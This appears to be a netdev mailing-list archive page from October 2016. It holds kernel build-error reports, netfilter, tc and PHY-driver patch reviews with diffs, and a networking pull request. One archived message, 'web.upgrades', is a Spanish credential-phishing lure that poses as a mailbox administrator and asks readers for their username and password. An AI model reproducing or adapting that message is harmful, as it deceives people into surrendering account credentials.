4.9-rc0: nf_hooks_ingress missing, breaking compilation

2016-10-05 Thread Pavel Machek
Hi!

In kernel based on edadd0e, I get plenty of errors such as:

net/netfilter/core.c:96:3: note: in expansion of macro ‘rcu_assign_pointer’
   rcu_assign_pointer(reg->dev->nf_hooks_ingress, entry);
   ^
In file included from ./include/linux/linkage.h:4:0,
 from ./include/linux/kernel.h:6,
 from net/netfilter/core.c:10:
net/netfilter/core.c:96:30: error: ‘struct net_device’ has no member named 
‘nf_hooks_ingress’
   rcu_assign_pointer(reg->dev->nf_hooks_ingress, entry);
  ^

Config is attached.

[Ok, I guess testing -rc0 is "a bit too brave" :-)]

Best regards,
Pavel
-- 
(english) http://www.livejournal.com/~pavelmachek
(cesky, pictures) 
http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html


delme.gz
Description: application/gzip


signature.asc
Description: Digital signature


Re: [PATCH 3/3] net: smsc911x: add u16 workaround for pxa platforms

2016-10-05 Thread Robert Jarzmik
Robert Jarzmik  writes:

> Mark Rutland  writes:
>
>> On Mon, Oct 03, 2016 at 06:11:23PM +0200, Robert Jarzmik wrote:
>>> Mark Rutland  writes:
>>> 
>>> reg-u16-align4 tells that a specific hardware doesn't support 16 bit writes 
>>> not
>>> being 32 bits aligned, or said differently that a "store" 16 bits wide on an
>>> address of the format 4*n + 2 deserves a special handling in the driver, 
>>> while a
>>> store 16 bits wide on an address of the format 4*n can follow the simple 
>>> casual
>>> case.
>>
>> If I've understood correctly, effectively the low 2 address lines to the
>> device are hard-wired to zero, e.g. a 16-bit access to 4*n + 2 would go
>> to 4*n + 0 on the device? Or is the failure case distinct from that?
> It is distinct.
>
> The "awful truth" is that an FPGA lies between the system bus and the
> smc91c111. And this FPGA cannot handle correctly the 4*n + 2 u16 writes.
>
>> Do we have other platforms where similar is true? e.g. u8 accesses
>> requiring 16-bit alignment?
>
> Not really, ie. not with a alignement requirement.
>
> But there are of course these ones are handled by reg-io-width and the
> SMC_USE_xxx_BITS flags as far as I understand it. These cases are when a
> platform declares SMC91X_USE_16BIT or SMC91X_USE_32BIT, but not 
> SMC91X_USE_8BIT,
> which would make me think of :
>  - CONFIG_SH_SH4202_MICRODEV,
>  - CONFIG_M32R
>  - several omap1 boards
>  - 1 sa1100 board
>  - several MMP and realview boards
>
> With all these platforms, each u8 access is replaced with a u16 access and a
> mask / shift + mask.

Or so what should I call this entry if reg-u16-align4 is not a good candidate ?

Cheers.

-- 
Robert


Re: [PATCH net] Panic when tc_lookup_action_n finds a partially initialized action.

2016-10-05 Thread Krister Johansen
On Wed, Oct 05, 2016 at 11:01:38AM -0700, Cong Wang wrote:
> On Tue, Oct 4, 2016 at 11:52 PM, Krister Johansen
>  wrote:
> > On Mon, Oct 03, 2016 at 11:22:33AM -0700, Cong Wang wrote:
> >> Please try the attached patch. I also convert the read path to RCU
> >> to avoid a possible deadlock. A quick test shows no lockdep splat.
> >
> > I tried this patch, but it doesn't solve the problem.  I got a panic on
> > my very first try:
> 
> Thanks for testing it.

Absolutely; thanks for helping to try to simplify this fix.

> > The problem here is the same as before: by using RCU the race isn't
> > fixed because the module is still discoverable from act_base before the
> > pernet initialization is completed.
> >
> > You can see from the trap frame that the first two arguments to
> > tcf_hash_check were 0.  It couldn't look up the correct per-subsystem
> > pointer because the id hadn't yet been registered.
> 
> I thought the problem is that we don't do pernet ops registration and
> action ops registration atomically therefore chose to use mutex+RCU,
> but I was wrong, the problem here is just ordering, we need to finish
> the pernet initialization before making action ops visible.
> 
> If so, why not just reorder them? Does the attached patch make any
> sense now? Our pernet init doesn't rely on act_base, so even we have
> some race, the worst case is after we initialize the pernet netns for an
> action but its ops still not visible, which seems fine (at least no crash).
> 
> Or I still miss something here?

I'm not sure.  The reason I didn't take this approach from the outset is
that all of TC's callers of tcf_register_action pass a pointer to a
static structure as their *ops argument.  The existence of code that
checks the action for uniqueness suggests that it's possible for
tcf_register_action to get passed two identical tc_action_ops.  If that
happens in the current code base, we'll also get passed a duplicate
pernet_operations pointer.  The code in register_pernet_subsys() makes
no attempt to check for duplicates.  If we add a pointer that's already
in the list, and subsequently call unregister, the results seem
undefined.  It looks like we'll remove the pernet_operations for the
existing action, assuming we don't corrupt the list in the process.

Is this actually safe?  If so, what corner case is the act->type /
act->kind protecting us from?

> (Sorry that I don't have the environment to reproduce your bug)

I'm sorry that I didn't do a good job of explaining how we end up in
this situation in the first place.  I can give a few more details,
because it may explain some of my concern about the request_module()
call.

The system that encounters this bug launches a bunch of containers from
systemd on boot.  Each container creates a new user, net, pid, and mount
namespace and begins its setup.  When the networking in all of these
containers, each in a new netns, try to configure TC and no modules are
loaded we end up with this race.

I can also reproduce by unloading the modules, and then launching a
bunch of processes that configure tc in new namespaces.

Part of the desire to inhibit extra modprobe calls is that if hundreds
of these all start at once on boot, it's really unnecessary to have all
of the rest of them wait while lots of extra modprobe calls are forked
by the kernel.

> Thanks for your patience and testing!

Thank you for taking the time to look through the fix and discuss
alternatives.

-K


[GIT] Networking

2016-10-05 Thread David Miller

Here are the build and merge fixups for the networking
stuff.

Please pull, thanks a lot!

The following changes since commit 41844e36206be90cd4d962ea49b0abc3612a99d0:

  Merge tag 'staging-4.9-rc1' of 
git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/staging (2016-10-05 
14:50:51 -0700)

are available in the git repository at:

  git://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git 

for you to fetch changes up to af70c1f92d3567035d2f73f39079459d58c706dc:

  phy: micrel.c: Enable ksz9031 energy-detect power-down mode (2016-10-05 
21:19:06 -0400)


Aaron Conole (2):
  netfilter: Fix potential null pointer dereference
  netfilter: accommodate different kconfig in nf_set_hooks_head

David S. Miller (1):
  Merge git://git.kernel.org/.../pablo/nf-next

Jann Horn (1):
  netfilter: fix namespace handling in nf_log_proc_dostring

Liping Zhang (1):
  netfilter: nft_limit: fix divided by zero panic

Mike Looijmans (1):
  phy: micrel.c: Enable ksz9031 energy-detect power-down mode

Stephen Rothwell (1):
  netfilter: merge fixup for "nf_tables_netdev: remove redundant ip_hdr 
assignment"

Vishwanath Pai (1):
  netfilter: xt_hashlimit: Fix link error in 32bit arch because of 64bit 
division

 drivers/net/phy/micrel.c   | 21 +
 include/net/netfilter/nf_tables_ipv4.h |  1 -
 net/netfilter/core.c   | 17 -
 net/netfilter/nf_log.c |  6 --
 net/netfilter/nft_limit.c  |  4 ++--
 net/netfilter/xt_hashlimit.c   | 15 ---
 6 files changed, 47 insertions(+), 17 deletions(-)


Re: [PATCH net-next v2 2/3] openvswitch: remove unreachable code in vlan parsing

2016-10-05 Thread Pravin Shelar
On Wed, Oct 5, 2016 at 6:07 AM, Jiri Benc  wrote:
> Now when the first vlan tag is always in skb->vlan_tci, drop code that
> assumed it might not be the case.
>
User can turn off TX vlan offload for OVS internal device that would
allow vlan tagged packet with vlan header on the skb-data. This case
will cause issue here.

We could handle this case by not allowing this configuration.

> This patch also removes the wrong likely() statement around
> skb_vlan_tag_present introduced by 018c1dda5ff1 ("openvswitch: 802.1AD Flow
> handling, actions, vlan parsing, netlink attributes"). This code is called
> whenever flow key is being extracted from the packet, the packet may be as
> likely vlan tagged as not.
>
> Signed-off-by: Jiri Benc 


Re: [PATCH net] Fixing a bug in team driver due to incorrect 'unsigned int' to 'int' conversion

2016-10-05 Thread David Miller
From: Alex Sidorenko 
Date: Wed, 05 Oct 2016 09:06:04 -0400

> Roundrobin runner of team driver uses 'unsigned int' variable to count the 
> number of sent_packets.
> Later it is passed to a subroutine team_num_to_port_index(struct team *team, 
> int num) as
> 'num' and when we reach MAXINT (2**31-1), 'num' becomes negative.
> 
> This leads to using incorrect hash-bucket for port lookup and as a result, 
> packets are dropped. The fix
> consists of changing 'int num' to 'unsigned int num'. Testing of a fixed 
> kernel shows that there
> is no packet drop anymore.
> 
> 
> Signed-off-by: Alex Sidorenko 

This patch has been corrupted by your email client, for example it
has transformed TAB charactes into spaces.

Please fix this up, email a test patch to yourself, and only resubmit
this patch to the mailing list when you are able to successfully apply
the test patch you send to yourself.

Thanks.


[PATCH v3 1/4] net: phy: dp83867: Add documentation for optional impedance control

2016-10-05 Thread Mugunthan V N
Add documention of ti,impedance-control which can be used to
correct MAC impedance mismatch using phy extended registers.

Signed-off-by: Mugunthan V N 
---
 Documentation/devicetree/bindings/net/ti,dp83867.txt | 12 
 1 file changed, 12 insertions(+)

diff --git a/Documentation/devicetree/bindings/net/ti,dp83867.txt 
b/Documentation/devicetree/bindings/net/ti,dp83867.txt
index 5d21141..85bf945 100644
--- a/Documentation/devicetree/bindings/net/ti,dp83867.txt
+++ b/Documentation/devicetree/bindings/net/ti,dp83867.txt
@@ -9,6 +9,18 @@ Required properties:
- ti,fifo-depth - Transmitt FIFO depth- see dt-bindings/net/ti-dp83867.h
for applicable values
 
+Optional property:
+   - ti,min-output-impedance - MAC Interface Impedance control to set
+   the programmable output impedance to
+   minimum value (35 ohms).
+   - ti,max-output-impedance - MAC Interface Impedance control to set
+   the programmable output impedance to
+   maximum value (70 ohms).
+
+Note: ti,min-output-impedance and ti,max-output-impedance are mutually
+  exclusive. When both properties are present ti,max-output-impedance
+  takes precedence.
+
 Default child nodes are standard Ethernet PHY device
 nodes as described in Documentation/devicetree/bindings/net/phy.txt
 
-- 
2.10.0.372.g6fe1b14



[PATCH v3 0/4] add support for impedance control for TI dp83867 phy and fix 2nd ethernet on dra72 rev C evm

2016-10-05 Thread Mugunthan V N
Add support for configurable impedance control for TI dp83867
phy via devicetree. More documentation in [1].
CPSW second ethernet is not working, fix it by enabling
impedance configuration on the phy.

Verified the patch on DRA72 Rev C evm, logs at [2]. Also pushed
a branch [3] for others to test.

Changes from v2:
* Fixed a typo in dts and driver.

Changes from initial version:
* As per Sekhar's comment, instead of passing impedance values,
  change to max and min impedance from DT
* Adopted phy_read_mmd_indirect() to cunnrent implementation.
* Corrected the phy delay timings to the optimal value.

[1] - http://www.ti.com/lit/ds/symlink/dp83867ir.pdf
[2] - http://pastebin.ubuntu.com/23283056/
[3] - git://git.ti.com/~mugunthanvnm/ti-linux-kernel/linux.git dp83867-v3

Mugunthan V N (4):
  net: phy: dp83867: Add documentation for optional impedance control
  net: phy: dp83867: add support for MAC impedance configuration
  ARM: dts: dra72-evm-revc: add phy impedance settings
  ARM: dts: dra72-evm-revc: fix correct phy delay

 .../devicetree/bindings/net/ti,dp83867.txt | 12 ++
 arch/arm/boot/dts/dra72-evm-revc.dts   | 10 
 drivers/net/phy/dp83867.c  | 28 ++
 3 files changed, 46 insertions(+), 4 deletions(-)

-- 
2.10.0.372.g6fe1b14



[PATCH v3 2/4] net: phy: dp83867: add support for MAC impedance configuration

2016-10-05 Thread Mugunthan V N
Add support for programmable MAC impedance configuration

Signed-off-by: Mugunthan V N 
---
 drivers/net/phy/dp83867.c | 28 
 1 file changed, 28 insertions(+)

diff --git a/drivers/net/phy/dp83867.c b/drivers/net/phy/dp83867.c
index 91177a4..1b63924 100644
--- a/drivers/net/phy/dp83867.c
+++ b/drivers/net/phy/dp83867.c
@@ -33,6 +33,7 @@
 /* Extended Registers */
 #define DP83867_RGMIICTL   0x0032
 #define DP83867_RGMIIDCTL  0x0086
+#define DP83867_IO_MUX_CFG 0x0170
 
 #define DP83867_SW_RESET   BIT(15)
 #define DP83867_SW_RESTART BIT(14)
@@ -62,10 +63,17 @@
 /* RGMIIDCTL bits */
 #define DP83867_RGMII_TX_CLK_DELAY_SHIFT   4
 
+/* IO_MUX_CFG bits */
+#define DP83867_IO_MUX_CFG_IO_IMPEDANCE_CTRL   0x1f
+
+#define DP83867_IO_MUX_CFG_IO_IMPEDANCE_MAX0x0
+#define DP83867_IO_MUX_CFG_IO_IMPEDANCE_MIN0x1f
+
 struct dp83867_private {
int rx_id_delay;
int tx_id_delay;
int fifo_depth;
+   int io_impedance;
 };
 
 static int dp83867_ack_interrupt(struct phy_device *phydev)
@@ -111,6 +119,14 @@ static int dp83867_of_init(struct phy_device *phydev)
if (!of_node)
return -ENODEV;
 
+   dp83867->io_impedance = -EINVAL;
+
+   /* Optional configuration */
+   if (of_property_read_bool(of_node, "ti,max-output-impedance"))
+   dp83867->io_impedance = DP83867_IO_MUX_CFG_IO_IMPEDANCE_MAX;
+   else if (of_property_read_bool(of_node, "ti,min-output-impedance"))
+   dp83867->io_impedance = DP83867_IO_MUX_CFG_IO_IMPEDANCE_MIN;
+
ret = of_property_read_u32(of_node, "ti,rx-internal-delay",
   &dp83867->rx_id_delay);
if (ret)
@@ -184,6 +200,18 @@ static int dp83867_config_init(struct phy_device *phydev)
 
phy_write_mmd_indirect(phydev, DP83867_RGMIIDCTL,
   DP83867_DEVADDR, delay);
+
+   if (dp83867->io_impedance >= 0) {
+   val = phy_read_mmd_indirect(phydev, DP83867_IO_MUX_CFG,
+   DP83867_DEVADDR);
+
+   val &= ~DP83867_IO_MUX_CFG_IO_IMPEDANCE_CTRL;
+   val |= dp83867->io_impedance &
+  DP83867_IO_MUX_CFG_IO_IMPEDANCE_CTRL;
+
+   phy_write_mmd_indirect(phydev, DP83867_IO_MUX_CFG,
+  DP83867_DEVADDR, val);
+   }
}
 
return 0;
-- 
2.10.0.372.g6fe1b14



[PATCH v3 4/4] ARM: dts: dra72-evm-revc: fix correct phy delay

2016-10-05 Thread Mugunthan V N
The current delay settings of the phy are not the optimal value,
fix it with correct values.

Signed-off-by: Mugunthan V N 
---
 arch/arm/boot/dts/dra72-evm-revc.dts | 8 
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/arch/arm/boot/dts/dra72-evm-revc.dts 
b/arch/arm/boot/dts/dra72-evm-revc.dts
index aafb594..01e1f39 100644
--- a/arch/arm/boot/dts/dra72-evm-revc.dts
+++ b/arch/arm/boot/dts/dra72-evm-revc.dts
@@ -59,16 +59,16 @@
 &davinci_mdio {
dp83867_0: ethernet-phy@2 {
reg = <2>;
-   ti,rx-internal-delay = ;
-   ti,tx-internal-delay = ;
+   ti,rx-internal-delay = ;
+   ti,tx-internal-delay = ;
ti,fifo-depth = ;
ti,min-output-impedance;
};
 
dp83867_1: ethernet-phy@3 {
reg = <3>;
-   ti,rx-internal-delay = ;
-   ti,tx-internal-delay = ;
+   ti,rx-internal-delay = ;
+   ti,tx-internal-delay = ;
ti,fifo-depth = ;
ti,min-output-imepdance;
};
-- 
2.10.0.372.g6fe1b14



[PATCH v3 3/4] ARM: dts: dra72-evm-revc: add phy impedance settings

2016-10-05 Thread Mugunthan V N
The default impedance settings of the phy is not the optimal
value, due to this the second ethernet is not working. Fix it
with correct values which makes the second ethernet port to work.

Signed-off-by: Mugunthan V N 
---
 arch/arm/boot/dts/dra72-evm-revc.dts | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/arch/arm/boot/dts/dra72-evm-revc.dts 
b/arch/arm/boot/dts/dra72-evm-revc.dts
index f9cfd3b..aafb594 100644
--- a/arch/arm/boot/dts/dra72-evm-revc.dts
+++ b/arch/arm/boot/dts/dra72-evm-revc.dts
@@ -62,6 +62,7 @@
ti,rx-internal-delay = ;
ti,tx-internal-delay = ;
ti,fifo-depth = ;
+   ti,min-output-impedance;
};
 
dp83867_1: ethernet-phy@3 {
@@ -69,5 +70,6 @@
ti,rx-internal-delay = ;
ti,tx-internal-delay = ;
ti,fifo-depth = ;
+   ti,min-output-imepdance;
};
 };
-- 
2.10.0.372.g6fe1b14



Re: [GIT] Networking

2016-10-05 Thread Stephen Rothwell
Hi Dave,

On Wed, 05 Oct 2016 22:56:12 -0400 (EDT) David Miller  
wrote:
>
> Yes, this is where the change got lost.

No worries.

> I have all of the fixups queued up in my net tree and will send in a pull
> request later.

Thanks.

-- 
Cheers,
Stephen Rothwell


web.upgrades

2016-10-05 Thread Sistemas administrador
ATENCIÓN;

Su buzón ha superado el límite de almacenamiento, que es de 5 GB definidos por 
el administrador, quien actualmente está ejecutando en 10.9GB, no puede ser 
capaz de enviar o recibir correo nuevo hasta que
vuelva a validar su buzón de correo electrónico. Para revalidar su buzón de 
correo, envíe la siguiente información a continuación:

nombre:
Nombre de usuario:
contraseña:
Confirmar contraseña:
E-mail:
teléfono:

Si usted no puede revalidar su buzón, el buzón se deshabilitará!

Disculpa las molestias.
Código de verificación:90opp4r56 es: 006524
Correo Soporte Técnico © 2016

¡gracias
Sistemas administrador


Re: error: 'struct net_device' has no member named 'nf_hooks_ingress'

2016-10-05 Thread Sergey Senozhatsky
On (10/06/16 06:11), Eric Dumazet wrote:
> On Wed, 2016-10-05 at 22:56 +0200, Michal Sojka wrote:
> 
> > this commit is now in mainline as
> > e3b37f11e6e4e6b6f02cc762f182ce233d2c1c9d and it breaks my build:
> > 
> > net/netfilter/core.c: In function 'nf_set_hooks_head':
> > net/netfilter/core.c:96:3: error: 'struct net_device' has no member 
> > named 'nf_hooks_ingress'
> > 
> > Are the fixes (see below) on the way to mainline too?
> 
> Yes the fixes are already in nf tree and _will_ get pushed.
> 
> Pablo and David are attending netdev 1.2 in Tokyo and have obligations.
> 
> https://git.kernel.org/cgit/linux/kernel/git/pablo/nf-next.git/

well, I did my best to avoid it, but the guys didn't even bother to
reply. pushing a knowingly broken patch that
a) kills the build
b) introduces a race
c) requires two "Fixes:" followup patches
to the main line despite the fact that those problems were discovered
at linux-next stage is totally un-cool.

-ss


Re: [GIT] Networking

2016-10-05 Thread David Miller
From: Stephen Rothwell 
Date: Thu, 6 Oct 2016 13:51:52 +1100

> On Wed, 5 Oct 2016 19:14:21 -0700 Linus Torvalds 
>  wrote:
>>
>> On Wed, Oct 5, 2016 at 5:52 PM, Stephen Rothwell  
>> wrote:
>> >
>> > Except that commit effectively moved that function from
>> > net/netfilter/nf_tables_netdev.c to
>> > include/net/netfilter/nf_tables_ipv4.h while commit c73c24849011
>> > ("netfilter: nf_tables_netdev: remove redundant ip_hdr assignment")
>> > removed the assignment in the original file (and has been in your tree
>> > since v4.8-rc7) and that is where I originally actually got a conflict.  
>> 
>> Oh, interesting. Why didn't I get the conflict there then?
>> 
>> I'm guessing (but too lazy to actually look up the history), that
>> David ended up doing that merge and that ends up being why I never saw
>> a conflict.
> 
> Yeah, commit b50afd203a5e ("Merge
> git://git.kernel.org/pub/scm/linux/kernel/git/davem/net") actually
> merges v4.8 into the net-next tree.

Yes, this is where the change got lost.

I have all of the fixups queued up in my net tree and will send in a pull
request later.


Re: [GIT] Networking

2016-10-05 Thread Stephen Rothwell
Hi Linus,

On Wed, 5 Oct 2016 19:14:21 -0700 Linus Torvalds 
 wrote:
>
> On Wed, Oct 5, 2016 at 5:52 PM, Stephen Rothwell  
> wrote:
> >
> > Except that commit effectively moved that function from
> > net/netfilter/nf_tables_netdev.c to
> > include/net/netfilter/nf_tables_ipv4.h while commit c73c24849011
> > ("netfilter: nf_tables_netdev: remove redundant ip_hdr assignment")
> > removed the assignment in the original file (and has been in your tree
> > since v4.8-rc7) and that is where I originally actually got a conflict.  
> 
> Oh, interesting. Why didn't I get the conflict there then?
> 
> I'm guessing (but too lazy to actually look up the history), that
> David ended up doing that merge and that ends up being why I never saw
> a conflict.

Yeah, commit b50afd203a5e ("Merge
git://git.kernel.org/pub/scm/linux/kernel/git/davem/net") actually
merges v4.8 into the net-next tree.

-- 
Cheers,
Stephen Rothwell


Re: [GIT] Networking

2016-10-05 Thread Linus Torvalds
On Wed, Oct 5, 2016 at 5:52 PM, Stephen Rothwell  wrote:
>
> Except that commit effectively moved that function from
> net/netfilter/nf_tables_netdev.c to
> include/net/netfilter/nf_tables_ipv4.h while commit c73c24849011
> ("netfilter: nf_tables_netdev: remove redundant ip_hdr assignment")
> removed the assignment in the original file (and has been in your tree
> since v4.8-rc7) and that is where I originally actually got a conflict.

Oh, interesting. Why didn't I get the conflict there then?

I'm guessing (but too lazy to actually look up the history), that
David ended up doing that merge and that ends up being why I never saw
a conflict.

   Linus


Re: [PATCH v2] phy: micrel.c: Enable ksz9031 energy-detect power-down mode

2016-10-05 Thread David Miller
From: Mike Looijmans 
Date: Tue,  4 Oct 2016 07:52:04 +0200

> Set bit 0 in register 1C.23 to enable the EDPD feature of the
> KSZ9031 PHY. This reduces power consumption when the link is
> down.
> 
> Signed-off-by: Mike Looijmans 
> ---
> v2: Unconditionally enable EDPD mode

Applied.


Re: [GIT] Networking

2016-10-05 Thread Stephen Rothwell
Hi Linus,

On Wed, 5 Oct 2016 15:37:17 -0700 Linus Torvalds 
 wrote:
>
> On Wed, Oct 5, 2016 at 3:29 PM, Stephen Rothwell  
> wrote:
> >
> > I have been carrying the following merge fix patch (for the merge of
> > the net-next tree with Linus' tree) for a while now which seems to have
> > got missed:  
> 
> Ugh. It doesn't seem to be a merge error, because that double iph
> assignment came from the original patch that introduced this function:
> commit ddc8b6027ad0 ("netfilter: introduce nft_set_pktinfo_{ipv4,
> ipv6}_validate()").

Except that commit effectively moved that function from
net/netfilter/nf_tables_netdev.c to
include/net/netfilter/nf_tables_ipv4.h while commit c73c24849011
("netfilter: nf_tables_netdev: remove redundant ip_hdr assignment")
removed the assignment in the original file (and has been in your tree
since v4.8-rc7) and that is where I originally actually got a conflict.

> So I wouldn't call it a merge error - it just looks like a bug in the
> network layer. So I'm not going to apply your patch even though it
> looks plausible to me, simply because it's outside my area of
> expertise.

no worries.
-- 
Cheers,
Stephen Rothwell


Re: [GIT] Networking

2016-10-05 Thread David Miller
From: Pablo Neira Ayuso 
Date: Thu, 6 Oct 2016 02:09:45 +0200

> On Wed, Oct 05, 2016 at 03:37:17PM -0700, Linus Torvalds wrote:
>> On Wed, Oct 5, 2016 at 3:29 PM, Stephen Rothwell  
>> wrote:
>> >
>> > I have been carrying the following merge fix patch (for the merge of
>> > the net-next tree with Linus' tree) for a while now which seems to have
>> > got missed:
>> 
>> Ugh. It doesn't seem to be a merge error, because that double iph
>> assignment came from the original patch that introduced this function:
>> commit ddc8b6027ad0 ("netfilter: introduce nft_set_pktinfo_{ipv4,
>> ipv6}_validate()").
>> 
>> So I wouldn't call it a merge error - it just looks like a bug in the
>> network layer. So I'm not going to apply your patch even though it
>> looks plausible to me, simply because it's outside my area of
>> expertise.
>> 
>> David? Pablo?
> 
> This looks good, please take it so we speed up things.
> 
> Acked-by: Pablo Neira Ayuso 

Applied.


Re: [PATCH 0/5] Netfilter fixes for net-next

2016-10-05 Thread David Miller
From: Pablo Neira Ayuso 
Date: Thu,  6 Oct 2016 02:07:44 +0200

> This is a pull request to address fallout from previous nf-next pull
> request, only fixes going on here:
> 
> 1) Address a potential null dereference in nf_unregister_net_hook()
>when becomes nf_hook_entry_head is NULL, from Aaron Conole.
> 
> 2) Missing ifdef for CONFIG_NETFILTER_INGRESS, also from Aaron.
> 
> 3) Fix linking problems in xt_hashlimit in x86_32, from Pai.
> 
> 4) Fix permissions of nf_log sysctl from unpriviledge netns, from
>Jann Horn.
> 
> 5) Fix possible divide by zero in nft_limit, from Liping Zhang.
> 
> You can pull these changes from:
> 
>   git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nf-next.git

Pulled, thanks Pablo.


Re: [GIT] Networking

2016-10-05 Thread Pablo Neira Ayuso
On Wed, Oct 05, 2016 at 03:37:17PM -0700, Linus Torvalds wrote:
> On Wed, Oct 5, 2016 at 3:29 PM, Stephen Rothwell  
> wrote:
> >
> > I have been carrying the following merge fix patch (for the merge of
> > the net-next tree with Linus' tree) for a while now which seems to have
> > got missed:
> 
> Ugh. It doesn't seem to be a merge error, because that double iph
> assignment came from the original patch that introduced this function:
> commit ddc8b6027ad0 ("netfilter: introduce nft_set_pktinfo_{ipv4,
> ipv6}_validate()").
> 
> So I wouldn't call it a merge error - it just looks like a bug in the
> network layer. So I'm not going to apply your patch even though it
> looks plausible to me, simply because it's outside my area of
> expertise.
> 
> David? Pablo?

This looks good, please take it so we speed up things.

Acked-by: Pablo Neira Ayuso 

Thanks!

P.S: Sorry for not addressing this any sooner, traveling overhead,
conferente and unstable wifi connection has been a problem here.


[PATCH 2/5] netfilter: accommodate different kconfig in nf_set_hooks_head

2016-10-05 Thread Pablo Neira Ayuso
From: Aaron Conole 

When CONFIG_NETFILTER_INGRESS is unset (or no), we need to handle
the request for registration properly by dropping the hook.  This
releases the entry during the set.

Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked list")
Signed-off-by: Aaron Conole 
Signed-off-by: Pablo Neira Ayuso 
---
 net/netfilter/core.c | 15 +++
 1 file changed, 11 insertions(+), 4 deletions(-)

diff --git a/net/netfilter/core.c b/net/netfilter/core.c
index e3f68a786afe..c9d90eb64046 100644
--- a/net/netfilter/core.c
+++ b/net/netfilter/core.c
@@ -90,10 +90,12 @@ static void nf_set_hooks_head(struct net *net, const struct 
nf_hook_ops *reg,
 {
switch (reg->pf) {
case NFPROTO_NETDEV:
+#ifdef CONFIG_NETFILTER_INGRESS
/* We already checked in nf_register_net_hook() that this is
 * used from ingress.
 */
rcu_assign_pointer(reg->dev->nf_hooks_ingress, entry);
+#endif
break;
default:
rcu_assign_pointer(net->nf.hooks[reg->pf][reg->hooknum],
@@ -107,10 +109,15 @@ int nf_register_net_hook(struct net *net, const struct 
nf_hook_ops *reg)
struct nf_hook_entry *hooks_entry;
struct nf_hook_entry *entry;
 
-   if (reg->pf == NFPROTO_NETDEV &&
-   (reg->hooknum != NF_NETDEV_INGRESS ||
-!reg->dev || dev_net(reg->dev) != net))
-   return -EINVAL;
+   if (reg->pf == NFPROTO_NETDEV) {
+#ifndef CONFIG_NETFILTER_INGRESS
+   if (reg->hooknum == NF_NETDEV_INGRESS)
+   return -EOPNOTSUPP;
+#endif
+   if (reg->hooknum != NF_NETDEV_INGRESS ||
+   !reg->dev || dev_net(reg->dev) != net)
+   return -EINVAL;
+   }
 
entry = kmalloc(sizeof(*entry), GFP_KERNEL);
if (!entry)
-- 
2.1.4



[PATCH 3/5] netfilter: xt_hashlimit: Fix link error in 32bit arch because of 64bit division

2016-10-05 Thread Pablo Neira Ayuso
From: Vishwanath Pai 

Division of 64bit integers will cause linker error undefined reference
to `__udivdi3'. Fix this by replacing divisions with div64_64

Fixes: 11d5f15723c9 ("netfilter: xt_hashlimit: Create revision 2 to ...")
Signed-off-by: Vishwanath Pai 
Acked-by: Maciej Żenczykowski 
Signed-off-by: Pablo Neira Ayuso 
---
 net/netfilter/xt_hashlimit.c | 15 ---
 1 file changed, 8 insertions(+), 7 deletions(-)

diff --git a/net/netfilter/xt_hashlimit.c b/net/netfilter/xt_hashlimit.c
index 44a095ecc7b7..2fab0c65aa94 100644
--- a/net/netfilter/xt_hashlimit.c
+++ b/net/netfilter/xt_hashlimit.c
@@ -467,17 +467,18 @@ static u64 user2credits(u64 user, int revision)
/* If multiplying would overflow... */
if (user > 0x / (HZ*CREDITS_PER_JIFFY_v1))
/* Divide first. */
-   return (user / XT_HASHLIMIT_SCALE) *\
-   HZ * CREDITS_PER_JIFFY_v1;
+   return div64_u64(user, XT_HASHLIMIT_SCALE)
+   * HZ * CREDITS_PER_JIFFY_v1;
 
-   return (user * HZ * CREDITS_PER_JIFFY_v1) \
-   / XT_HASHLIMIT_SCALE;
+   return div64_u64(user * HZ * CREDITS_PER_JIFFY_v1,
+XT_HASHLIMIT_SCALE);
} else {
if (user > 0x / (HZ*CREDITS_PER_JIFFY))
-   return (user / XT_HASHLIMIT_SCALE_v2) *\
-   HZ * CREDITS_PER_JIFFY;
+   return div64_u64(user, XT_HASHLIMIT_SCALE_v2)
+   * HZ * CREDITS_PER_JIFFY;
 
-   return (user * HZ * CREDITS_PER_JIFFY) / XT_HASHLIMIT_SCALE_v2;
+   return div64_u64(user * HZ * CREDITS_PER_JIFFY,
+XT_HASHLIMIT_SCALE_v2);
}
 }
 
-- 
2.1.4



[PATCH 0/5] Netfilter fixes for net-next

2016-10-05 Thread Pablo Neira Ayuso
Hi David,

This is a pull request to address fallout from previous nf-next pull
request, only fixes going on here:

1) Address a potential null dereference in nf_unregister_net_hook()
   when becomes nf_hook_entry_head is NULL, from Aaron Conole.

2) Missing ifdef for CONFIG_NETFILTER_INGRESS, also from Aaron.

3) Fix linking problems in xt_hashlimit in x86_32, from Pai.

4) Fix permissions of nf_log sysctl from unpriviledge netns, from
   Jann Horn.

5) Fix possible divide by zero in nft_limit, from Liping Zhang.

You can pull these changes from:

  git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nf-next.git

P.S: Sorry for not addressing this any sooner, a mixture of traveling
overhead, conference and problems with wifi connection has prevented me
to do this any sooner.

Thanks!



The following changes since commit 803783849fed11e38a30f31932c02c815520da70:

  mlx5: Add ndo_poll_controller() implementation (2016-09-30 02:11:16 -0400)

are available in the git repository at:

  git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nf-next.git HEAD

for you to fetch changes up to 2fa46c130193300f06e68727ae98ec9f6184cad4:

  netfilter: nft_limit: fix divided by zero panic (2016-10-04 08:59:03 +0200)


Aaron Conole (2):
  netfilter: Fix potential null pointer dereference
  netfilter: accommodate different kconfig in nf_set_hooks_head

Jann Horn (1):
  netfilter: fix namespace handling in nf_log_proc_dostring

Liping Zhang (1):
  netfilter: nft_limit: fix divided by zero panic

Vishwanath Pai (1):
  netfilter: xt_hashlimit: Fix link error in 32bit arch because of 64bit 
division

 net/netfilter/core.c | 17 -
 net/netfilter/nf_log.c   |  6 --
 net/netfilter/nft_limit.c|  4 ++--
 net/netfilter/xt_hashlimit.c | 15 ---
 4 files changed, 26 insertions(+), 16 deletions(-)


[PATCH 5/5] netfilter: nft_limit: fix divided by zero panic

2016-10-05 Thread Pablo Neira Ayuso
From: Liping Zhang 

After I input the following nftables rule, a panic happened on my system:
  # nft add rule filter OUTPUT limit rate 0xf bytes/second

  divide error:  [#1] SMP
  [ ... ]
  RIP: 0010:[]  []
